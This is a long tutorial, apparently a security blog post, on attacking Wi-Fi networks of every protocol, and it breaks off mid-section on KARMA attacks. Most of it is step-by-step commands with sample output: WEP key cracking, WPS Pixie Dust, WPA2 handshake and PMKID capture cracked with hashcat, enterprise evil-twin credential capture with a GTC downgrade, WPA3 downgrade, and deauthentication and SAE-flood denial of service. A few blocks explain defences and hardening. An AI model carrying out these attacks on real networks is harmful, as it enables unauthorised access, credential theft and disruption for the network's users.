Wi-Fi hacking, every protocol, every attack
This is the article I wish existed when I started doing wireless security assessments. Every guide I found covered one protocol, one attack, one tool. None of them gave the full picture. None of them showed what the terminal actually looks like when you run the commands. And none of them covered the techniques that came out of recent academic research and BlackHat presentations.
This article covers everything. WEP, WPA, WPA2-PSK, WPA2-Enterprise, WPA3-SAE, WPS, and the protocol-agnostic attacks that work regardless of encryption. For each one, I’ll explain the protocol internals, the attack methodology, the exact commands, and what the output looks like. I’ll also cover the techniques that most red teamers skip because they either don’t know about them or think they’re too complex.
Let’s get into it.
Prerequisites and setup
Hardware
You need a wireless adapter that supports monitor mode and packet injection. Not all adapters do. The chipset matters more than the brand.
Reliable chipsets for wireless auditing:
- Mediatek MT7612U (Alfa AWUS036ACM): 2.4 GHz and 5 GHz, best current choice
- Realtek RTL8812AU (Alfa AWUS036ACH): 2.4 GHz and 5 GHz, widely supported
- Atheros AR9271 (Alfa AWUS036NHA): 2.4 GHz only, rock solid for legacy attacks
- Ralink RT3070 (Alfa AWUS036NH): 2.4 GHz, older but still works
I use the AWUS036ACM for most engagements. It handles both bands, injection works out of the box on Kali, and it’s small enough to carry in a laptop bag without looking suspicious.
Software
Everything runs on Kali Linux. The tools we’ll use:
```shell
sudo apt update
# hcxpcapngtool ships in the hcxtools package, and Kali names the wifite2 package "wifite".
# eaphammer is not in the Kali repositories; install it from its own repository.
sudo apt install -y aircrack-ng hashcat hcxdumptool hcxtools \
  hostapd-wpe freeradius bettercap mdk4 wifite reaver bully \
  pixiewps cowpatty asleap john wireshark tshark
```
Putting the adapter in monitor mode
Before anything else, we need to switch the adapter from managed mode (normal WiFi client) to monitor mode (passive packet capture and injection).
```console
# Check interface name
iwconfig
wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Frequency:2.437 GHz  Access Point: Not-Associated
          Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
```

```console
# Kill interfering processes
sudo airmon-ng check kill
Killing these processes:

  PID Name
  723 wpa_supplicant
  814 NetworkManager
```

```console
# Enable monitor mode
sudo airmon-ng start wlan0
PHY     Interface       Driver          Chipset
phy0    wlan0           mt76x2u         Mediatek Technology
        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)
```
Your interface is now wlan0mon. Let’s start scanning.
```console
sudo airodump-ng wlan0mon
CH  6 ][ Elapsed: 12 s ][ 2026-05-06 14:23

BSSID              PWR  Beacons  #Data  #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
AA:BB:CC:DD:EE:01  -42      127     84   12   6  54e  WPA2  CCMP    PSK   HomeNetwork
AA:BB:CC:DD:EE:02  -58       89     23    3   1  54e  WPA2  CCMP    PSK   CafeWiFi
AA:BB:CC:DD:EE:03  -61       45      0    0  11  54e  WPA3  CCMP    SAE   SecureOffice
AA:BB:CC:DD:EE:04  -35      201    412   45   6  54e  WPA2  CCMP    MGT   CorpNetwork
AA:BB:CC:DD:EE:05  -72       34     12    1   3  54e  WEP   WEP           LegacyPrinter
AA:BB:CC:DD:EE:06  -55       98     67    8   6  54e  WPA2  CCMP    PSK   Neighbor_5G

BSSID              STATION            PWR   Rate     Lost  Frames  Notes  Probes
AA:BB:CC:DD:EE:01  11:22:33:44:55:01  -38   1e- 1       0      47         HomeNetwork
AA:BB:CC:DD:EE:01  11:22:33:44:55:02  -51   1e- 6       0      23
AA:BB:CC:DD:EE:04  11:22:33:44:55:03  -44   11e-11      0     189         CorpNetwork
```
This single screen tells you everything: which networks exist, their encryption, their channel, signal strength, and which clients are connected. The ENC column is your attack selector. Let’s go protocol by protocol.
WEP (Wired Equivalent Privacy)
WEP is dead. It has been dead since 2004. But it still exists in the wild, usually on old printers, industrial equipment, or embedded systems that never got updated. If you see WEP during an engagement, it’s a guaranteed win.
Why WEP is broken
WEP uses the RC4 stream cipher with a 24-bit Initialization Vector (IV). The IV is sent in cleartext with every frame. Since the IV space is only 2^24 (about 16.7 million values), IVs repeat quickly on busy networks. Two frames that share an IV share a keystream, so the XOR of their plaintexts can be recovered. It is worse than that: certain weak IVs (the Fluhrer-Mantin-Shamir attack) directly leak bytes of the key, and with enough captured IVs the key is mathematically recoverable.
The attack
Step 1: Capture traffic on the target channel.
```console
sudo airodump-ng -c 3 --bssid AA:BB:CC:DD:EE:05 -w wep_capture wlan0mon
CH  3 ][ Elapsed: 2 mins ][ 2026-05-06 14:25

BSSID              PWR  RXQ  Beacons  #Data  #/s  CH  MB  ENC  CIPHER  AUTH  ESSID
AA:BB:CC:DD:EE:05  -72   84      312    847    6   3  54  WEP  WEP           LegacyPrinter

BSSID              STATION            PWR   Rate   Lost  Frames  Notes  Probes
AA:BB:CC:DD:EE:05  11:22:33:44:55:04  -65   1- 1      0     134
```
We need around 20,000 to 40,000 IVs to crack the key. If the network is quiet, that could take hours. We can speed this up.
Step 2: ARP replay attack to generate traffic.
```console
# Associate with the AP first (needed for injection)
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:05 wlan0mon
14:26:03  Sending Authentication Request (Open System) [ACK]
14:26:03  Authentication successful
14:26:03  Sending Association Request [ACK]
14:26:03  Association successful :-) (AID: 1)
```

```console
# Start ARP replay
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:05 wlan0mon
14:26:18  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:05) on channel 3
Saving ARP requests in replay_arp-0506-142618.cap
You should also start airodump-ng to capture replies.
Read 4832 packets (got 127 ARP requests and 98 ACKs), sent 4271 packets...(499 pps)
```
Watch the #Data column in airodump-ng climb. Once you hit 20,000+ IVs, crack it.
Step 3: Crack the key.
```console
sudo aircrack-ng wep_capture-01.cap
Opening wep_capture-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 43271 ivs.
KEY FOUND! [ 41:42:43:44:45 ]
Decrypted correctly: 100%
```
Total time from start to key: usually under 5 minutes on an active network. The key 41:42:43:44:45 is the ASCII representation of “ABCDE”. WEP is that broken.
The faster method: Chopchop / Fragmentation
If there’s zero traffic on the network (no ARP frames to replay), use the chopchop or fragmentation attack to forge packets from scratch.
```console
# Fragmentation attack: recover PRGA (keystream)
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:05 wlan0mon
14:28:41  Waiting for a data packet...
Read 97 packets...

        Size: 86, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  AA:BB:CC:DD:EE:05
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  11:22:33:44:55:04

Use this packet ? y
Saving chosen packet in replay_src-0506-142841.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Saving keystream in fragment-0506-142843.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
```

```shell
# Forge an ARP request using the recovered keystream
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:05 -h 11:22:33:44:55:04 \
  -l 255.255.255.255 -k 255.255.255.255 -y fragment-0506-142843.xor -w forged_arp.cap

# Replay the forged ARP to generate IVs
sudo aireplay-ng -2 -r forged_arp.cap wlan0mon
```
This generates massive amounts of traffic even on a silent network. IVs accumulate fast, and you crack the key the same way.
WPS (Wi-Fi Protected Setup)
WPS was designed to make WiFi setup easier. It introduced a PIN-based authentication mechanism that is fundamentally flawed.
Why WPS is broken
The WPS PIN is 8 digits, but the last digit is a checksum, so it’s really 7 digits. But it gets worse: the protocol verifies the PIN in two halves. The first half (4 digits, 10,000 possibilities) is verified separately from the second half (3 digits, 1,000 possibilities). This means you only need 11,000 attempts maximum instead of 10,000,000. At one attempt per second, that’s about 3 hours.
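To make the arithmetic above checkable, here is the WPS PIN checksum as defined in the Wi-Fi Simple Configuration specification together with the attempt counts the text quotes. This is an added example, not code from the article; the function names are mine.

```python
# Added example: WPS PIN checksum and the size of the online search space.
# Nothing here talks to a network; it only reproduces the numbers in the text.


def wps_checksum_digit(first_seven: str) -> int:
    """Return the 8th (checksum) digit for a 7-digit WPS PIN prefix.

    The specification weights digits 1, 3, 5, 7 by 3 and digits 2, 4, 6 by 1,
    then chooses the checksum so the weighted sum is a multiple of 10.
    """
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly 7 decimal digits")
    total = 0
    for index, digit in enumerate(first_seven):
        weight = 3 if index % 2 == 0 else 1
        total += weight * int(digit)
    return (10 - total % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN carries a correct checksum digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum_digit(pin[:7])


def worst_case_attempts(split_verification: bool) -> int:
    """Maximum guesses needed to exhaust the PIN space.

    With the checksum fixed, only 7 digits carry entropy: 10**7 PINs.
    Because the registrar protocol acknowledges the first half (M4) before
    the second half (M6) is checked, the halves can be searched separately:
    10**4 for digits 1-4 plus 10**3 for digits 5-7.
    """
    if split_verification:
        return 10**4 + 10**3
    return 10**7


def time_to_exhaust(attempts: int, seconds_per_attempt: float = 1.0) -> float:
    """Hours needed to try every PIN at a fixed rate."""
    return attempts * seconds_per_attempt / 3600.0


if __name__ == "__main__":
    # 12345670 is the well-known default PIN and passes the checksum
    print("12345670 valid:", is_valid_wps_pin("12345670"))
    print("attempts, split verification:", worst_case_attempts(True))
    print("hours at 1 attempt/s:", round(time_to_exhaust(worst_case_attempts(True)), 2))
```

The 11,000-attempt figure is why a rate limit of a few attempts per minute, or simply disabling the PIN method, is the only meaningful WPS mitigation.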
And then there’s Pixie Dust.
Pixie Dust attack (offline, seconds)
Some router chipsets (Ralink, Broadcom, Realtek) use predictable or weak random number generation for the E-S1 and E-S2 nonces during the WPS exchange. If the nonces are predictable, the PIN can be recovered from a single exchange without brute-forcing. This takes seconds.
```console
# Check if the target has WPS enabled
sudo wash -i wlan0mon
BSSID              Ch  dBm  WPS  Lck  Vendor    ESSID
AA:BB:CC:DD:EE:01   6  -42  2.0  No   RalinkTe  HomeNetwork
AA:BB:CC:DD:EE:02   1  -58  2.0  No   Broadcom  CafeWiFi
```
The Lck column shows if WPS is locked (rate-limited). No means we can try.
```console
# Pixie Dust attack with reaver
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:01 -c 6 -K 1 -vv
[+] Waiting for beacon from AA:BB:CC:DD:EE:01
[+] Received beacon from AA:BB:CC:DD:EE:01
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with AA:BB:CC:DD:EE:01 (ESSID: HomeNetwork)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending M8 message
[+] Received WSC NACK
[+] WPS PIN: '23456789'
[+] WPA PSK: 'MySuperSecretPassword123'
[+] AP SSID: 'HomeNetwork'
```
Pixie Dust recovered the WPS PIN and the WPA password in under 30 seconds. No brute-force, no handshake capture, no dictionary.
Bully is an alternative to reaver that handles some edge cases better:
```shell
sudo bully wlan0mon -b AA:BB:CC:DD:EE:01 -c 6 -d -v 3
```
Online PIN brute-force (when Pixie Dust fails)
If the chipset isn’t vulnerable to Pixie Dust, fall back to online brute-force:
```shell
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:01 -c 6 -d 1 -vv
```
The -d 1 flag adds a 1-second delay between attempts to avoid lockout. Most routers lock WPS after 3 failed attempts and require a cooldown period. Some lock permanently until reboot.
On routers that implement lockout, mdk4 can be used to continuously deauth the AP, causing it to reboot and reset the WPS lockout counter. This is noisy and not subtle.
```shell
# In a separate terminal: keep the AP cycling
sudo mdk4 wlan0mon d -B AA:BB:CC:DD:EE:01
```
WPS is still enabled by default on a staggering number of consumer routers in 2026. Even when the user sets a strong WPA2 password, WPS provides a trivially exploitable backdoor. The first thing I check on any wireless engagement is WPS status. It’s often the shortest path.
WPA/WPA2-PSK (Pre-Shared Key)
This is the most common encryption you’ll encounter. WPA2-PSK uses a 4-way handshake based on the Pre-Shared Key (PSK) and the SSID to derive session keys. The attack is always the same: capture the handshake, crack it offline.
But there are multiple ways to get that handshake, and the method matters.
Method 1: Classic handshake capture with deauthentication
Step 1: Target the network and capture.
```shell
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:01 -w wpa_capture wlan0mon
```
We need a client to connect (or reconnect) to capture the 4-way handshake. We can force a reconnection by deauthenticating an existing client.
Step 2: Deauth a client.
In a separate terminal:
```console
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:01 -c 11:22:33:44:55:01 wlan0mon
14:35:18  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:01) on channel 6
14:35:18  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [ 5|62 ACKs]
14:35:19  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [13|63 ACKs]
14:35:20  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [ 0|62 ACKs]
14:35:21  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [ 4|65 ACKs]
14:35:22  Sending 64 directed DeAuth (code 7). STMAC: [11:22:33:44:55:01] [ 7|61 ACKs]
```
Back in airodump-ng, you’ll see:
```console
CH  6 ][ Elapsed: 3 mins ][ 2026-05-06 14:35 ][ WPA handshake: AA:BB:CC:DD:EE:01

BSSID              PWR  RXQ  Beacons  #Data  #/s  CH  MB   ENC   CIPHER  AUTH  ESSID
AA:BB:CC:DD:EE:01  -42   91      587   1204   18   6  54e  WPA2  CCMP    PSK   HomeNetwork
```
The WPA handshake: AA:BB:CC:DD:EE:01 in the top right confirms capture.
Step 3: Crack with aircrack-ng (dictionary attack).
```console
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
Opening wpa_capture-01.cap
Read 18241 packets.

   #  BSSID              ESSID        Encryption
   1  AA:BB:CC:DD:EE:01  HomeNetwork  WPA (1 handshake)

Choosing first network as target.

Opening wpa_capture-01.cap
Reading packets, please wait...

                               Aircrack-ng 1.7

      [00:01:24] 384932/14344391 keys tested (4527.14 k/s)

      Time left: 51 minutes, 12 seconds                           2.68%

                           KEY FOUND! [ sunshine2024 ]

      Master Key     : 7A 3C D1 ... (32 bytes)
      Transient Key  : B4 19 E2 ... (64 bytes)
      EAPOL HMAC     : 91 C0 3F ... (16 bytes)
```
aircrack-ng cracks on CPU. It’s slow. For serious cracking, use hashcat on GPU.
Step 3b: Crack with hashcat (GPU).
First, convert the capture to hashcat format:
```console
# Convert .cap to .hc22000 (hashcat format)
hcxpcapngtool -o hash.hc22000 wpa_capture-01.cap
summary capture file:
---------------------
file name................................: wpa_capture-01.cap
file type................................: pcap
file size................................: 48271 bytes
packets inside...........................: 327
EAPOL pairs (best).......................: 1
EAPOL pairs written to hash.hc22000.....: 1
```

```console
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 CUDA) - Platform #1 [NVIDIA Corporation]
* Device #1: NVIDIA GeForce RTX 4090, 24176/24564 MB, 128MCU

hash.hc22000:0506...long hash...:HomeNetwork

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: hash.hc22000
Time.Started.....: Thu May  6 14:42:13 2026
Time.Estimated...: Thu May  6 14:42:28 2026
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 952.3 kH/s (7.12ms) @ Accel:32 Loops:128 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344391/14344391 (100.00%)

0506...long hash...:sunshine2024
```
An RTX 4090 does about 950,000 WPA2 hashes per second. Rockyou (14 million passwords) in about 15 seconds. For more serious attacks, use larger wordlists (Crackstation, WeakPass) or rule-based attacks.
Hashcat rule-based attack (for when dictionaries fail):
```shell
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule
```
This applies 64 transformation rules to each word: capitalize, append numbers, leet speak, reverse. Multiplies your wordlist by 64x.
Hashcat mask attack (brute-force with pattern):
```shell
# 8-digit numeric password
hashcat -m 22000 hash.hc22000 -a 3 '?d?d?d?d?d?d?d?d'

# "Name" + 4 digits
hashcat -m 22000 hash.hc22000 -a 3 '?u?l?l?l?l?d?d?d?d'
```
Method 2: PMKID attack (no client needed)
This is the technique that changed everything when it was published by Jens “atom” Steube (the hashcat author) in 2018. It captures a PMKID hash from the AP’s first message in the 4-way handshake. The critical advantage: you don’t need a connected client. You don’t need to deauth anyone. You just need to send an association request to the AP and grab the PMKID from the response.
The PMKID is calculated as `PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)`. Since the PMK is derived from the PSK and the SSID, you can verify password guesses offline.
```console
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --filtermode=2 \
  --filterlist_ap=AABBCCDDEEF1 --enable_status=3
start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0mon
FILTERLIST_AP............: 1 MAC(s)

MAC CLIENT...............: a]8c2e1f4d79 (sniffed)
MAC ACCESS POINT.........: aabbccddeef1
ESSID....................: HomeNetwork
PMKID....................: 2a9c3e7f1b4d8a5c0e6f2b7d9a1c3e5f
MESSAGE PAIR.............: M1M2 PMKID, EAPOL

INFO: capturing, 1 PMKID(s) found so far
```
```console
# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid_capture.pcapng
summary capture file:
---------------------
file name................................: pmkid_capture.pcapng
PMKID(s) (best).........................: 1
PMKID(s) written to pmkid.hc22000.......: 1
```

```shell
# Crack it exactly like a handshake
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt
```
Same cracking speed, same result. But you never had to deauth anyone. On stealth engagements, this is the preferred method.
Not all APs send the PMKID in their first message. It depends on the implementation. In my experience, about 60-70% of consumer routers respond with a PMKID. Enterprise APs and newer firmwares sometimes don’t. But when it works, it’s the cleanest attack available.
Method 3: Passive handshake capture (zero interaction)
If you have time and patience, you don’t need to deauth anyone at all. Just sit and wait for a client to connect naturally. In an office environment, phones reconnect constantly (employees arriving in the morning, phones coming back from sleep, roaming between APs).
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:01 -w passive_capture wlan0mon
Leave it running. On a busy network, you’ll capture a handshake within 15 to 30 minutes. On a quiet network, it might take hours. But the advantage is that you generate zero anomalous traffic. No deauth frames, no association requests, nothing in the logs.
The ESSID gotcha
Something that most guides forget to mention: WPA2-PSK derives the PMK from the PSK and the SSID. This means the same password on different SSIDs produces a different PMK. It also means precomputed hash tables (rainbow tables) must be generated per-SSID.
For common SSIDs like “linksys”, “NETGEAR”, “default”, precomputed tables exist and can crack passwords nearly instantly. For unique SSIDs, you’re stuck with runtime cracking.
```shell
# Generate a PMK database for a specific SSID (for faster future cracks)
genpmk -f /usr/share/wordlists/rockyou.txt -d pmk_HomeNetwork.db -s "HomeNetwork"

# Use the precomputed PMKs with cowpatty
cowpatty -d pmk_HomeNetwork.db -r wpa_capture-01.cap -s "HomeNetwork"
```
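The PMKID derivation from the PMKID section and the SSID dependence described in this section both fall out of the standard 802.11 key derivation, shown here as an added example that is not part of the article. The MAC addresses and passphrases are taken from the article's sample output; the function names are mine.

```python
# Added example: PMK and PMKID derivation as defined in IEEE 802.11.
# PMK   = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)
# PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA)
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key. The SSID is the PBKDF2 salt,
    which is exactly why the same passphrase gives a different PMK per SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def _mac_bytes(mac: str) -> bytes:
    """'AA:BB:CC:DD:EE:01' -> b'\\xaa\\xbb\\xcc\\xdd\\xee\\x01'"""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def derive_pmkid(pmk: bytes, mac_ap: str, mac_sta: str) -> bytes:
    """PMKID carried in the RSN IE of EAPOL message 1."""
    data = b"PMK Name" + _mac_bytes(mac_ap) + _mac_bytes(mac_sta)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def verify_passphrase(candidate: str, ssid: str, mac_ap: str,
                      mac_sta: str, observed_pmkid: bytes) -> bool:
    """The offline check the text describes: no client traffic is needed
    because everything except the passphrase is public."""
    expected = derive_pmkid(derive_pmk(candidate, ssid), mac_ap, mac_sta)
    return hmac.compare_digest(expected, observed_pmkid)


if __name__ == "__main__":
    ap, sta = "AA:BB:CC:DD:EE:01", "11:22:33:44:55:01"
    pmkid = derive_pmkid(derive_pmk("sunshine2024", "HomeNetwork"), ap, sta)
    print("PMKID:", pmkid.hex())
    print("correct passphrase verifies:", verify_passphrase("sunshine2024", "HomeNetwork", ap, sta, pmkid))
    # same passphrase, different SSID: a different PMK, so per-SSID tables are required
    print("PMK differs across SSIDs:",
          derive_pmk("sunshine2024", "HomeNetwork") != derive_pmk("sunshine2024", "Neighbor_5G"))
```

The 4096 PBKDF2 iterations are the only thing slowing the offline check down, which is why passphrase length and unpredictability, not the SSID, decide whether a PSK network survives a capture.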
WPA2-Enterprise (802.1X / EAP)
WPA2-Enterprise doesn’t use a shared password. Instead, each user authenticates individually via 802.1X using a RADIUS server. The common EAP methods are:
- EAP-PEAP/MSCHAPv2: Username + password inside a TLS tunnel
- EAP-TTLS: Similar to PEAP, different outer protocol
- EAP-TLS: Client certificate authentication (the hardest to attack)
The attack surface here is different. We’re not cracking a PSK. We’re setting up a rogue AP that impersonates the corporate network and captures user credentials when they connect.
Evil Twin against PEAP/MSCHAPv2
The classic attack. We create a fake AP with the same SSID as the target, present a fake RADIUS server, and capture the MSCHAPv2 challenge/response when clients connect.
Step 1: Set up the rogue AP with hostapd-wpe.
```shell
# Edit the configuration
sudo nano /etc/hostapd-wpe/hostapd-wpe.conf
```
Key settings to change:
```conf
interface=wlan0mon
ssid=CorpNetwork
channel=6
wpa=2
wpa_pairwise=CCMP
```

```console
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
Using interface wlan0mon with hwaddr aa:bb:cc:dd:ee:ff and ssid "CorpNetwork"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED
```
Step 2: Deauth clients from the real AP to force them to our rogue AP.
```shell
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:04 wlan0mon
```
When a client reconnects and our rogue AP has a stronger signal (or the real AP is being deauthed), the client will connect to us. In the hostapd-wpe output:
```console
wlan0mon: STA 11:22:33:44:55:03 IEEE 802.11: authenticated
wlan0mon: STA 11:22:33:44:55:03 IEEE 802.11: associated (aid 1)

mschapv2: Mon May 06 14:55:02 2026
     username: jsmith
     challenge: a1:b2:c3:d4:e5:f6:a7:b8
     response: 1a:2b:3c:4d:5e:6f:7a:8b:9c:0d:1e:2f:3a:4b:5c:6d:7e:8f:9a:0b:1c:2d:3e:4f
     jtr NETNTLM: jsmith:$NETNTLM$a1b2c3d4e5f6a7b8$1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f
     hashcat NETNTLM: jsmith::::1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f:a1b2c3d4e5f6a7b8
```
Step 3: Crack the MSCHAPv2 hash.
```shell
hashcat -m 5500 jsmith::::1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f:a1b2c3d4e5f6a7b8 \
  /usr/share/wordlists/rockyou.txt
```
MSCHAPv2 is based on DES and cracks extremely fast on GPU. An RTX 4090 can do around 75 billion NTLMv1/MSCHAPv2 hashes per second. Any password under 14 characters that’s based on dictionary words will fall in minutes.
EAPHammer (the easier way)
eaphammer automates the entire evil twin process for WPA2-Enterprise:
```shell
sudo eaphammer --bssid AA:BB:CC:DD:EE:04 --essid "CorpNetwork" --channel 6 \
  --interface wlan0mon --auth wpa-eap --creds
```
It handles the certificate generation, RADIUS configuration, and credential capture automatically. The captured credentials are written to a log file in the same hashcat-ready format.
The certificate problem
Here’s the thing that most red teamers don’t realize: the evil twin attack only works because most clients don’t properly validate the RADIUS server’s certificate. On Windows, when a client connects to a PEAP network for the first time, it shows a certificate warning. Most users click “Connect” without reading it. On Android, many versions don’t even show a warning.
However, if the organization has properly configured certificate pinning via GPO (Windows) or MDM (mobile), the evil twin attack fails. The client will refuse to connect because our self-signed certificate doesn’t match the pinned certificate.
The technique that bypasses this: GTC downgrade. Instead of MSCHAPv2 inside the PEAP tunnel, we negotiate EAP-GTC (Generic Token Card), which sends the password in plaintext. Some supplicants accept this downgrade silently.
```shell
sudo eaphammer --bssid AA:BB:CC:DD:EE:04 --essid "CorpNetwork" --channel 6 \
  --interface wlan0mon --auth wpa-eap --creds --negotiate GTC
```
If the client accepts GTC, the password arrives in cleartext. No cracking needed.
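Both the evil twin and the GTC downgrade depend on supplicant configuration, so here is what the client side looks like when it is, and is not, pinned down. This is an added example using wpa_supplicant's network block syntax, not a configuration from the article; the CA path, server name and identity are placeholders.

```conf
# Added example: wpa_supplicant network blocks for PEAP/MSCHAPv2.

# Weak: no ca_cert, so any server certificate (including a self-signed one
# from a rogue AP) is accepted; no phase2 restriction, so the supplicant may
# follow a server that proposes a different inner method.
network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jsmith"
    password="PLACEHOLDER"
}

# Hardened: trust only the corporate RADIUS CA, require the server's
# certificate to carry the expected name, fix the inner method, and
# require protected management frames so deauth-driven roaming is harder.
network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jsmith"
    anonymous_identity="anonymous"
    password="PLACEHOLDER"
    # placeholder path: the CA that issued the RADIUS server certificate
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    # placeholder name: must match the server certificate's subject/SAN
    domain_match="radius.corp.example"
    phase1="peapver=0"
    # only MSCHAPv2 is acceptable inside the tunnel; a GTC proposal is refused
    phase2="auth=MSCHAPV2"
    ieee80211w=2
}
```

The same three controls (trusted CA, server name match, fixed inner method) are what a Windows GPO or an MDM profile push to managed clients; a client that lacks any one of them is the one the evil twin in this section will catch.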
WPA3-SAE (Simultaneous Authentication of Equals)
WPA3 was supposed to fix everything. It replaces the 4-way handshake with SAE (Simultaneous Authentication of Equals), based on the Dragonfly key exchange. SAE provides forward secrecy and is resistant to offline dictionary attacks. In theory.
Dragonblood (CVE-2019-9494, CVE-2019-9496)
In 2019, Mathy Vanhoef and Eyal Ronen published Dragonblood, a set of attacks against WPA3-SAE. The attacks exploit implementation flaws in the Dragonfly handshake.
Side-channel attack (timing/cache):
The SAE handshake involves converting the password to a point on an elliptic curve using a hash-to-curve algorithm. This process involves a loop that runs a variable number of iterations depending on the password. By measuring the timing of the AP’s response, an attacker can infer information about the password and reduce the search space for an offline attack.
This is an academic attack. It requires precise timing measurements and is difficult in practice over WiFi due to jitter. But it works in controlled environments.
Transition mode downgrade:
Most WPA3 deployments use “transition mode” to maintain backward compatibility with WPA2 clients. In this mode, the AP advertises both WPA2 and WPA3. An attacker can force a client to connect using WPA2 by deauthing it and presenting a rogue AP that only advertises WPA2.
```shell
# Check if the AP supports transition mode: a BSSID that advertises both
# WPA2 and WPA3 shows both PSK and SAE in the AUTH column
sudo airodump-ng wlan0mon --wps
```
If the AP is in transition mode:
- Capture the WPA2 handshake (classic deauth method)
- Crack it offline as normal WPA2
The WPA3 security is entirely negated by transition mode. This is why the Wi-Fi Alliance recommends “WPA3-only mode” for sensitive networks. Almost nobody uses it because it breaks older devices.
SAE authentication flood DoS:
The SAE handshake is computationally expensive for the AP (elliptic curve operations). Sending a flood of SAE commit messages can overwhelm the AP’s CPU.
```shell
# Using mdk4 for SAE authentication flood
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:03 -m
```
This isn’t a key recovery attack, but it’s a denial of service that can force the AP to reboot or degrade to WPA2 transition mode.
WPA3 in practice
In 2026, pure WPA3-SAE networks (no transition mode) are genuinely hard to attack remotely. The timing side-channel requires lab conditions. Without transition mode, there’s no downgrade path. And PMKID doesn’t work against SAE.
The realistic attack path against WPA3-only networks is social engineering (evil twin with a captive portal that phishes the password) or targeting the clients rather than the AP (KARMA attack to capture probe requests).
WPA3 is the first WiFi encryption where the protocol itself isn’t the weak link. The weak link is the people and the transition period. Most networks will run transition mode for years, making WPA3 security purely theoretical.
Protocol-agnostic attacks
These attacks work regardless of the encryption type. They target the WiFi protocol itself (802.11 management frames) or the clients.
KARMA / Known Beacons attack
WiFi clients constantly broadcast “probe requests” looking for networks they’ve previously connected to. KARMA responds to all probe requests with a “Yes, I’m that network” regardless of what SSID was asked for. This tricks clients into connecting to your rogue AP.
```console
# Using bettercap for KARMA
sudo bettercap -iface wlan0mon
» wifi.recon on
» wifi.ap
» set wifi.ap.ssid "Free_WiFi"
» set wifi.ap.channel 6
» set wifi.ap.encryption false
» wifi.recon.channel 6
» set ticker.commands "wifi.show; wifi.deauth all"
» ticker on
```
Or with hostapd in KARMA mode:
```shell
# hostapd-mana (KARMA-capable fork of hostapd)
sudo hostapd-mana /etc/hostapd-mana/hostapd-mana.conf
